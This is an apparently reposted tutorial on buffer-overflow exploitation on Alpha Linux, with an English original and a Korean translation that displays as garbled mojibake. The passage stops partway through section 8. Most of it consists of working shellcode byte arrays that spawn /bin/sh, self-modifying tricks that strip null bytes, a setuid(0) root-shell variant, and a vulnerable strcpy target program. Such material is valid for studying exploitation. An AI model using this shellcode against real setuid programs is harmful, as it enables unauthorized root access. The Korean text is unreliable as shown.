|
http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=213 [º¹»ç]
-¿ÀÅÂÈ£´ÔÀÇ Çã¶ô¾øÀÌ ¹ø¿ªÇÑ ±ÛÀÔ´Ï´Ù.
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Buffer overflow exploit in the alpha linux
Written by Taeho Oh ( ohhara@postech.edu )
----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
----------------------------------------------------------------------------
1. Introduction
There are many exploit code of buffer overflow. However, almost all codes
works well only in the intel x86 linux. This paper will attempt to explain
how you exploit same bug in the alpha linux.
-¸¹Àº ¹öÆÛ¿À¹öÇ÷οì exploit code µéÀÌ ÀÖÁö¸¸ ´ëºÎºÐÀÌ ÀÎÅÚ x86 ¸®´ª½º¿¡¼¸¸
µ¿ÀÛÇÕ´Ï´Ù. ÀÌ ±ÛÀº °°Àº ¹ö±×¸¦ ¾ËÆĸ®´ª½º¿¡¼ ¾î¶»°Ô exploit ÇÏ´ÂÁö¸¦ ¼³¸í
ÇÕ´Ï´Ù.
2. What do you have to know before reading?
You have to know assembly language, C language, and Linux. Of course, you
have to know what buffer overflow is. You can get the information of the
buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit
by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend
you to read that before reading this one.
-¾î¼Àºí¸®, C, ¸®´ª½º¸¦ ¾Ë°íÀÖ¾î¾ßÇÕ´Ï´Ù. ¹°·Ð ¹öÆÛ¿À¹öÇ÷ο쿡´ëÇؼµµ.. ¹öÆÛ
¿À¹öÇ÷ο쿡 ´ëÇÑ Á¤º¸´Â phrack 49-14 ( Smashing The Stack For Fun And Profit
by Aleph1 ) ¿¡¼ ¾òÀ» ¼ö ÀÖ½À´Ï´Ù. »ó´çÈ÷ ÁÁÀº±ÛÀ̸ç ÀÌ ±ÛÀ» º¸±âÀü¿¡ Àо½Ã
±â¸¦ ±ÇÇص帳´Ï´Ù.
3. The registers of alpha linux
You have to know how much registers alpha has to make a shellcode. :)
All registers have 64 bits.
-½©Äڵ带 ¸¸µé·Á¸é ÀÌ ¸¹Àº ¾ËÆÄ ·¹Áö½ºÅ͵éÀ» ¾Ë¾Æ¾ßÇÕ´Ï´Ù. ¸ðµç ·¹Áö½ºÅ͵éÀº
64ºñÆ®ÀÔ´Ï´Ù.
Registers of alpha (¾ËÆÄÀÇ ·¹Áö½ºÅ͵é)
----------------------------------------------------------------------------
$0 v0
$1 t0
$2 t1
$3 t2
$4 t3
$5 t4
$6 t5
$7 t6
$8 t7
$9 s0
$10 s1
$11 s2
$12 s3
$13 s4
$14 s5
$15 fp
$16 a0
$17 a1
$18 a2
$19 a3
$20 a4
$21 a5
$22 t8
$23 t9
$24 t10
$25 t11
$26 ra
$27 t12
$28 at
$29 gp
$30 sp
$31 zero
$32 pc
$33 vfp
----------------------------------------------------------------------------
4. Make a simple shellcode
Now, you will make a simple shellcode. You need not think about '\0'
character now. Because you can modify and remove '\0' character later.
-ÀÚ ÀÌÁ¦ °£´ÜÇÑ ½©Äڵ带 ¸¸µé¾îº¼°Ì´Ï´Ù. Áö±ÝÀº '\0'(³Î¹®ÀÚ) ¿¡´ëÇؼ ½Å°æ¾µ
ÇÊ¿ä ¾ø½À´Ï´Ù. ³ªÁß¿¡ ¼öÁ¤ »èÁ¦ ÇÒ ¼öÀÖÀ¸´Ï±î¿ä.
shellcodeasm.c
----------------------------------------------------------------------------
#include<stdio.h>
main()
{
char *name[2];
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0],name,NULL);
}
----------------------------------------------------------------------------
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o shellcodeasm -static shellcodeasm.c
[ ohhara@ohhara ~ ] {2} $ gdb shellcodeasm
GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "alpha-redhat-linux"...
(gdb) disassemble main
Dump of assembler code for function main:
0x1200001e8 <main>: ldah gp,18(t12)
0x1200001ec <main+4>: lda gp,30704(gp)
0x1200001f0 <main+8>: lda sp,-32(sp)
0x1200001f4 <main+12>: stq ra,0(sp)
0x1200001f8 <main+16>: stq fp,8(sp)
0x1200001fc <main+20>: mov sp,fp
0x120000200 <main+24>: ldq t0,-30952(gp)
0x120000204 <main+28>: stq t0,16(fp)
0x120000208 <main+32>: stq zero,24(fp)
0x12000020c <main+36>: ldq a0,16(fp)
0x120000210 <main+40>: addq fp,0x10,a1
0x120000214 <main+44>: clr a2
0x120000218 <main+48>: ldq t12,-32456(gp)
0x12000021c <main+52>: jsr ra,(t12),0x120007180 <__execve>
0x120000220 <main+56>: ldah gp,18(ra)
0x120000224 <main+60>: lda gp,30648(gp)
0x120000228 <main+64>: mov fp,sp
0x12000022c <main+68>: ldq ra,0(sp)
0x120000230 <main+72>: ldq fp,8(sp)
0x120000234 <main+76>: addq sp,0x20,sp
0x120000238 <main+80>: ret zero,(ra),0x1
End of assembler dump.
(gdb) disassemble execve
Dump of assembler code for function __execve:
0x120007180 <__execve>: lda v0,59(zero)
0x120007184 <__execve+4>: callsys
0x120007188 <__execve+8>: bne a3,0x120007190 <__execve+16>
0x12000718c <__execve+12>: ret zero,(ra),0x1
0x120007190 <__execve+16>: br gp,0x120007194 <__execve+20>
0x120007194 <__execve+20>: ldah gp,18(gp)
0x120007198 <__execve+24>: lda gp,2116(gp)
0x12000719c <__execve+28>: ldq t12,-31592(gp)
0x1200071a0 <__execve+32>:
jmp zero,(t12),0x120007738 <__syscall_error>
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
Now, you can know the condition to execute the "/bin/sh".
ÀÌÁ¦ "/bin/sh" ¸¦ ½ÇÇà½ÃÅ°±â À§ÇÑ Á¶°ÇÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.
To execute "/bin/sh"
----------------------------------------------------------------------------
a0($16) = The address of "/bin/sh\0"
a1($17) = The address of the address of "/bin/sh\0"
a2($18) = 0
v0($0) = 59
callsys
----------------------------------------------------------------------------
With this information, you can make a shellcode very easily.
-ÀÌ Á¤º¸µé·Î ½±°Ô ½©Äڵ带 ¸¸µé ¼ö ÀÖ½À´Ï´Ù.
testsc1.c
----------------------------------------------------------------------------
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x68\x00\x7f\x26" /* ldah $19,0x0068($31) */
"\x2f\x73\x73\x22" /* lda $19,0x732f($19) */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x3b\x00\x1f\x20" /* lda $0,59($31) */
"\x83\x00\x00\x00"; /* callsys */
typedef void (*F)();
main()
{
F fp;
fp=(F)(&shellcode);
fp();
}
----------------------------------------------------------------------------
You may be frightened at the code. Don't worry. There is a line by line
explanation. :)
-ÀÌ Äڵ尡 ¿©·¯ºÐÀ» Áú¸®°Ô ¸¸µé¾úÀ»Áöµµ ¸ð¸£°Ú±º¿ä. °ÆÁ¤¸¶½Ê½Ã¿À ÇÑÁÙÇÑÁÙ
¼³¸íÀ» Çسù½À´Ï´Ù.
testsc1.c shellcode line by line explanation
----------------------------------------------------------------------------
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
/* $16 = $30 - 200 */
/* $30 is stack pointer. To point "/bin/sh\0", */
/* shellcode needs free memory space. $30 - 200 may be */
/* free. :) "/bin/sh\0" character string will be stored */
/* in the $30 - 200 address. To execute "/bin/sh", $16 */
/* have to point to "/bin/sh\0" */
/* The 'q' of the 'subq' means 64 bit. */
/* $16 = $30 - 200
$30 Àº ½ºÅÃÆ÷ÀÎÅÍÀÔ´Ï´Ù. "/bin/sh\0" ¸¦ point ÇϱâÀ§Çؼ,
½©ÄÚµå´Â free memory space °¡ ÇÊ¿äÇÕ´Ï´Ù. $30 - 200 ÀÌ
¾Æ¸¶ free ÀÏ°Ì´Ï´Ù. :) "/bin/sh\0" ¹®ÀÚ¿Àº $30 - 200
¾îµå·¹½º¿¡ ÀúÀåµÉ°Ì´Ï´Ù. "/bin/sh" ¸¦ ½ÇÇàÇÏ·Á¸é $16 Àº
"/bin/sh\0" À» point ÇؾßÇÕ´Ï´Ù.
'subq' ÀÇ 'q' ´Â 64ºñÆ®¸¦ ÀǹÌÇÕ´Ï´Ù. */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
/* $17 = $30 - 192 */
/* To execute "/bin/sh", $17 have to point to the */
/* address of "/bin/sh\0". The address of "/bin/sh\0" */
/* will be stored in the $30 - 192 address. */
/* $17 = $30 - 192
"/bin/sh" ¸¦ ½ÇÇàÇϱâ À§Çؼ, $17 Àº "/bin/sh\0" ÀÇ ¾îµå·¹½º¸¦
point ÇؾßÇÕ´Ï´Ù. "/bin/sh\0" ÀÇ ¾îµå·¹½º´Â $30 - 192 À§Ä¡¿¡
ÀúÀåµÉ°ÍÀÔ´Ï´Ù. */
"\x12\x04\xff\x47" /* clr $18 */
/* Clear $18 register. To execute "/bin/sh" $18 */
/* register must be 0. */
/* $18 ·¹Áö½ºÅ͸¦ clear ÇÕ´Ï´Ù. "/bin/sh" ¸¦ ½ÇÇàÇϱâÀ§Çؼ
$18 ·¹Áö½ºÅÍ´Â 0 À̾î¾ßÇÕ´Ï´Ù. */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
/* Store the address of "/bin/sh\0" in the $30 - 192 */
/* address. */
/* "/bin/sh\0" ÀÇ ¾îµå·¹½º¸¦ $30 - 192 À§Ä¡¿¡
ÀúÀåÇÕ´Ï´Ù. */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
/* Make 0 in the address of $30 - 184. */
/* $30 - 184 À§Ä¡ÀÇ °ªÀ» 0 À¸·Î ¸¸µì´Ï´Ù. */
"\x68\x00\x7f\x26" /* ldah $19,0x0068($31) */
/* $19 = 0x00680000 */
/* $31 is always 0 */
/* $19 = 0x00680000
$31 ´Â Ç×»ó 0 ÀÔ´Ï´Ù. */
"\x2f\x73\x73\x22" /* lda $19,0x732f($19) */
/* $19 = 0x0068732f */
/* $19 = "/sh\0" */
/* Because alpha is little endian. */
/* $19 = 0x0068732f
$19 = "/sh\0"
¾ËÆÄ´Â little endian À̱⠶§¹®ÀÔ´Ï´Ù. */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
/* Store $19 in $30 - 196 address. */
/* $30 - 196 = "/sh\0" */
/* The 'l' of the 'stl' means 32 bit */
/* $19 ¸¦ $30 - 196 À§Ä¡¿¡ ÀúÀåÇÕ´Ï´Ù.
$30 - 196 = "/sh\0"
'stl' ÀÇ 'l' Àº 32ºñÆ® ¶ó´Â ¶æÀÔ´Ï´Ù. */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
/* $19 = 0x6e690000 */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
/* $19 = 0x6e69622f */
/* $19 = "/bin" */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
/* Store $19 in $30 - 200 address. */
/* $30 - 200 = "/bin" */
/* $30 - 200 À§Ä¡¿¡ $19 ÀúÀå
$30 - 200 = "/bin" */
"\x3b\x00\x1f\x20" /* lda $0,59($31) */
/* $0 = 59 */
/* To execute "/bin/sh" $0 must be 59 */
/* $0 = 59
"/bin/sh" ¸¦ ½ÇÇàÇϱâ À§Çؼ $0 Àº 59 À̾î¾ßÇÕ´Ï´Ù. */
"\x83\x00\x00\x00"; /* callsys */
/* System call */
/* Execute "/bin/sh" */
/* System call
"/bin/sh" ½ÇÇà */
----------------------------------------------------------------------------
compile and execute testsc1.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc1.c -o testsc1
[ ohhara@ohhara ~ ] {2} $ ./testsc1
bash$
----------------------------------------------------------------------------
Now, you have a shellcode of alpha linux. However, you can't use it to exploit
the vulnerable programs. Because the shellcode has many '\0' characters.
You have to remove all of '\0' character to use buffer overflow exploit.
-ÀÌÁ¦ ¿©·¯ºÐÀº ¾ËÆÄ ¶ó´ª½ºÀÇ ½©Äڵ带 ¾ò¾ú½À´Ï´Ù. ±×·¸Áö¸¸ ÀÌ°ÍÀ» exploit ÇÏ´Â
µ¥ »ç¿ëÇÒ ¼ö´Â ¾ø½À´Ï´Ù. ½©Äڵ忡 '\0' °¡ Æ÷ÇÔµÇÀֱ⠶§¹®ÀÔ´Ï´Ù. ¹öÆÛ¿À¹öÇ÷οì
exploit À» ÇϱâÀ§Çؼ´Â '\0' À» ¸ðµÎ Á¦°ÅÇؾßÇÕ´Ï´Ù.
5. Try to remove '\0' character in the shellcode
You can remove '\0' characters by changing the instructions to other
instructions which works same.
-°°Àº ÀÏÀ»ÇÏ´Â ´Ù¸¥ instructions(¸í·É)À¸·Î ¹Ù²ÞÀ¸·Î¼ '\0' À» Á¦°ÅÇÒ ¼ö ÀÖ½À´Ï´Ù.
remove '\0' character
----------------------------------------------------------------------------
from
"\x68\x00\x7f\x26" /* ldah $19,0x0068($31) */
"\x2f\x73\x73\x22" /* lda $19,0x732f($19) */
to
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
----------------------------------------------------------------------------
One '\0' is removed.
----------------------------------------------------------------------------
from
"\x3b\x00\x1f\x20" /* lda $0,59($31) */
to
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
----------------------------------------------------------------------------
Two '\0' are removed.
improved shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\x83\x00\x00\x00"; /* callsys */
----------------------------------------------------------------------------
compile and execute testsc2.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc2.c -o testsc2
[ ohhara@ohhara ~ ] {2} $ ./testsc2
bash$
----------------------------------------------------------------------------
You have only one instruction to remove, now. But it's difficult to remove.
Because callsys insturction must be used to execute "/bin/sh" and callsys
contains three '\0' characters. You have to insert the code which modifies the
shellcode itself to use callsys instruction.
-ÀÌÁ¦ ÇϳªÀÇ ¸í·É¸¸ ¼Õº¸¸é µË´Ï´Ù¸¸, ÀÌ°Ç Á¦°ÅÇϱâ Á» ¾î·Æ½À´Ï´Ù. ¿Ö³Ä¸é
callsys ¸í·ÉÀº "/bin/sh" ¸¦ ½ÇÇàÇϴµ¥ »ç¿ëµÇ¾î¾ßÇÕ´Ï´Ù. callsys ¸í·É¿¡´Â
'\0' °¡ ¼¼°³ ÀÖÁÒ. ¿©·¯ºÐÀº callsys ¸í·ÉÀ» »ç¿ëÇϵµ·Ï ½º½º·Î ½©Äڵ带 ¼öÁ¤
ÇÏ´Â Äڵ带 »ðÀÔÇØ¾ß ÇÕ´Ï´Ù.
6. Try to remove ALL '\0' character in the shellcode
You have to remove '\0' character of callsys instruction.
-callsys ¸í·ÉÀÇ '\0' À» Á¦°ÅÇؾßÇÕ´Ï´Ù.
final shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
/* $16 = $30 - 200
/* $16 must have the shellcode address. However, before */
/* the bsr instruction, $16 can't have the address. */
/* This instruction just store the meaningless address. */
/* The all instruction before bsr are meaningless. */
/* $16 Àº ½©ÄÚµå ¾îµå·¹½º¸¦ °¡Áö°í ÀÖ¾î¾ßÇÕ´Ï´Ù. ±×·¯³ª
bsr ¸í·É ÀÌÀü¿¡, $16 ÀÌ ¾îµå·¹½º¸¦ °¡Áú ¼ö ¾ø½À´Ï´Ù.
ÀÌ ¸í·ÉÀº ±×Àú Àǹ̾ø´Â ¾îµå·¹½º¸¦ ÀúÀåÇÕ´Ï´Ù.
bsr ¸í·É ÀÌÀüÀÇ ¸í·ÉµéÀº ¸ðµÎ ¾Æ¹« ÀÇ¹Ì ¾ø½À´Ï´Ù. */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
/* $17 = 0 or 0x83 (³í¸³ÇÕ ¿¬»ê) */
/* $17 = 0x83 */
"\x12\x94\x07\x42" /* addq $16,60,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
/* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4 */
/* address. */
/* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" ) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
/* $17 = "\x1f\x04\xff\x47" */
/* "\x1f\x04\xff\x47" is nop instruction. */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
/* change "bsr $16,-28" instruction" into nop */
/* instruction to pass through the bsr instruction. */
/* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" ) */
"\xf9\xff\x1f\xd2" /* bsr $16,-28 */
/* Jump to "bis $31,0x83,$17" and store the current */
/* address in the $16. */
/* After jump, this insturction will be changed into */
/* nop instruction. */
/* "bis $31,0x83,$17" ·Î Á¡ÇÁÇÏ°í ÇöÀçÀÇ ¾îµå·¹½º¸¦
$16 ¿¡ ÀúÀåÇÕ´Ï´Ù.
Á¡ÇÁÇÑ ÈÄ¿¡ ÀÌ ¸í·ÉÀº nop ¸í·ÉÀ¸·Î ¹Ù²î¾îÁú°ÍÀÔ´Ï´Ù. */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
/* This will be changed to "\x83\x00\x00\x00" */
----------------------------------------------------------------------------
compile and execute testsc3.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc3.c -o testsc3
[ ohhara@ohhara ~ ] {2} $ ./testsc3
bash$
----------------------------------------------------------------------------
7. Insert setuid(0) code in the shellcode.
You may not get the rootshell with your shellcode by overflowing the
vulnerable setuid root program. You have to insert setuid(0) code into the
shellcode.
-Ãë¾àÇÑ setuid root ÇÁ·Î±×·¥¿¡¼ ¹öÆÛ¿À¹öÇ÷ο츦 ÀÏÀ¸Äѵµ, ÀÌ ½©ÄÚµå·Î´Â
·çÆ®½©À» ¾òÁö ¸øÇÒ ¼öµµ ÀÖ½À´Ï´Ù. ½©Äڵ忡 setuid(0) Äڵ带 »ðÀÔÇؾßÇÕ´Ï´Ù.
setuidasm.c
----------------------------------------------------------------------------
main()
{
setuid(0);
}
----------------------------------------------------------------------------
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
[ ohhara@ohhara ~ ] {2} $ gdb setuidasm
GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "alpha-redhat-linux"...
(gdb) disassemble main
Dump of assembler code for function main:
0x1200001e8 <main>: ldah gp,18(t12)
0x1200001ec <main+4>: lda gp,30696(gp)
0x1200001f0 <main+8>: lda sp,-16(sp)
0x1200001f4 <main+12>: stq ra,0(sp)
0x1200001f8 <main+16>: stq fp,8(sp)
0x1200001fc <main+20>: mov sp,fp
0x120000200 <main+24>: clr a0
0x120000204 <main+28>: ldq t12,-31056(gp)
0x120000208 <main+32>: jsr ra,(t12),0x120007180 <__setuid>
0x12000020c <main+36>: ldah gp,18(ra)
0x120000210 <main+40>: lda gp,30660(gp)
0x120000214 <main+44>: mov fp,sp
0x120000218 <main+48>: ldq ra,0(sp)
0x12000021c <main+52>: ldq fp,8(sp)
0x120000220 <main+56>: addq sp,0x10,sp
0x120000224 <main+60>: ret zero,(ra),0x1
End of assembler dump.
(gdb) disassemble setuid
Dump of assembler code for function __setuid:
0x120007180 <__setuid>: lda v0,23(zero)
0x120007184 <__setuid+4>: callsys
0x120007188 <__setuid+8>: bne a3,0x120007190 <__setuid+16>
0x12000718c <__setuid+12>: ret zero,(ra),0x1
0x120007190 <__setuid+16>: br gp,0x120007194 <__setuid+20>
0x120007194 <__setuid+20>: ldah gp,18(gp)
0x120007198 <__setuid+24>: lda gp,2108(gp)
0x12000719c <__setuid+28>: ldq t12,-31600(gp)
0x1200071a0 <__setuid+32>:
jmp zero,(t12),0x120007738 <__syscall_error>
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
Now, you can know the condition to setuid(0).
To setuid(0)
----------------------------------------------------------------------------
a0($16) = 0
v0($0) = 23
callsys
----------------------------------------------------------------------------
This contains callsys instruction. So you have to remove '\0' of the setuid(0)
code, too.
-¿©±â¿¡µµ callsys ¸í·ÉÀÌ ÀÖ½À´Ï´Ù. ±×·¡¼ setuid(0) ÄÚµåÀÇ '\0' À» Á¦°ÅÇؾß
ÇÕ´Ï´Ù.
testsc4.c
----------------------------------------------------------------------------
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf7\xff\x1f\xd2" /* bsr $16,-32 */
"\x10\x04\xff\x47" /* clr $16 */
"\x11\x14\xe3\x43" /* addq $31,24,$17 */
"\x20\x35\x20\x42" /* subq $17,1,$0 */
"\xff\xff\xff\xff" /* callsys ( disguised ) */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
typedef void (*F)();
main()
{
F fp;
fp=(F)(&shellcode);
fp();
}
----------------------------------------------------------------------------
If you read this paper, you can recognize what testsc4.c do. :)
-À̱ÛÀ» ÀаíÀÖ´Ù¸é, testsc4.c °¡ ¹»ÇÏ´ÂÁö ¾Ë¼öÀÖ°ÚÁÒ. :)
compile and execute testsc4.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc4.c -o testsc4
[ ohhara@ohhara ~ ] {2} $ ./testsc4
bash$
----------------------------------------------------------------------------
8. Exploit a vulnerable setuid root program
You can exploit a classic vulnernable program in the alpha linux. This
is an example.
-¿¹ÀüÀÇ Ãë¾àÇÑ ÇÁ·Î±×·¥À» ¾ËÆĸ®´ª½º¿¡¼ exploit ÇÒ ¼ö ÀÖ½À´Ï´Ù. ´ÙÀ½Àº
¿¹ ÀÔ´Ï´Ù.
vulnerable.c
----------------------------------------------------------------------------
#include<stdio.h>
#include<string.h>
void vulfunc(char *buf)
{
char localbuf[1024];
strcpy(localbuf+1,buf);
}
main(int argc,char **argv)
{
if(argc>1)
vulfunc(argv[1]);
}
----------------------------------------------------------------------------
You can't change the return address of the vulfunc function. When you try
to overflow the localbuf of vulfunc, you can change the return address of
the main function. ( It's similar to the stack of the sparc. )
Because the localbuf is stored after the vulfunc return address. The intel
x86 is that localbuf is stored before the vulfunc return address.
Therefore, by overflowing localbuf in the intel x86, localbuf can change
the return address of vulfunc function. However, in the alpha, localbuf can't
change the return address of vulfunc function and can change the return address
of the main function.
-vulfunc ÇÔ¼öÀÇ ¸®ÅϾîµå·¹½º¸¦ ¹Ù²Ü¼ö´Â ¾ø½À´Ï´Ù. vulfunc ÀÇ localbuf ¸¦ ¿À¹öÇ÷Î
¿ì ÀÏÀ¸Å³¶§, main ÇÔ¼öÀÇ ¸®ÅÏ ¾îµå·¹½º¸¦ ¹Ù²Ü ¼ö ÀÖ½À´Ï´Ù. (½ºÆÅÀÇ ½ºÅðú À¯»ç)
¿Ö³ÄÇϸé localbuf °¡ vulfunc ¸®ÅϾîµå·¹½ºÀÇ µÚ¿¡ ÀúÀåµÇ±â¶§¹®ÀÔ´Ï´Ù. Intel x86 ¿¡¼
´Â localbuf °¡ vulfunc ¸®ÅϾîµå·¹½ºÀÇ ¾Õ¿¡ ÀúÀåµË´Ï´Ù. ±×·¡¼ intel x86 ¿¡¼´Â
localbuf ¸¦ ¿À¹öÇ÷οì ÀÏÀ¸ÄѼ vulfunc ÇÔ¼öÀÇ ¸®ÅϾîµå·¹½º¸¦ ¹Ù²Ü ¼öÀÖ½À´Ï´Ù. ±×·¯
³ª, ¾ËÆÄ¿¡¼´Â localbuf ·Î vulfunc ÇÔ¼öÀÇ ¸®ÅϾîµå·¹½º¸¦ ¹Ù²Ü ¼ö ¾ø°í main ÇÔ¼öÀÇ
¸®ÅϾîµå·¹½º¸¦ ¹Ù²Ü ¼ö ÀÖ½À´Ï´Ù.
To execute the instruction, the code must be well aligned. For example,
the instruction can be located in 0x120000000 and 0x120000004 and can't be
located in 0x120000001, 0x120000002, and 0x120000003. ( step by 4 )
-Instruction(¸í·É)À» ½ÇÇà½ÃÅ°±â À§Çؼ´Â Äڵ尡 Á¦´ë·Î Á¤·ÄµÇ¾î ÀÖ¾î¾ß ÇÕ´Ï´Ù.
¿¹¸¦µé¸é, instruction Àº 0x120000000, 0x120000004 ¿¡ À§Ä¡ÇÒ ¼ö´Â ÀÖÁö¸¸
0x120000001, 0x120000002, 0x120000003 ¿¡ À§Ä¡ÇÒ ¼ö ¾ø½À´Ï´Ù. ( step by 4 )
The address of alpha is 64 bit. Almost all cases, the address of stack
is looks like 0x000000011fffff24. The address has many '\0' characters.
Therefore, you can't insert many return addresses in the buffer. You must
insert only one. So you must know the location of the return address exactly.
It's not difficult to find that. Because the location of the return address
is decided at the compile time.
-¾ËÆÄÀÇ ¾îµå·¹½º´Â 64ºñÆ®ÀÔ´Ï´Ù. ´ëºÎºÐÀÇ°æ¿ì ½ºÅÃÀÇ ¾îµå·¹½º´Â 0x000000011fffff24 ÀÌ
·±½ÄÀÔ´Ï´Ù. ¾îµå·¹½º¿¡ '\0' ÀÌ ¸¹ÀÌ ÀÖÁÒ. ±×·¡¼ ¹öÆÛ¿¡ ¸®ÅÏ ¾îµå·¹½º¸¦ ¸¹ÀÌ »ðÀÔÇÒ ¼ö
°¡ ¾ø½À´Ï´Ù. ²À Çϳª¸¸ ³Ö¾î¾ßÇÕ´Ï´Ù. ±×·¯¹Ç·Î ¸®ÅÏ ¾îµå·¹½º ³ÖÀ»°÷À» Á¤È®ÇÏ°Ô ¾Ë¾Æ
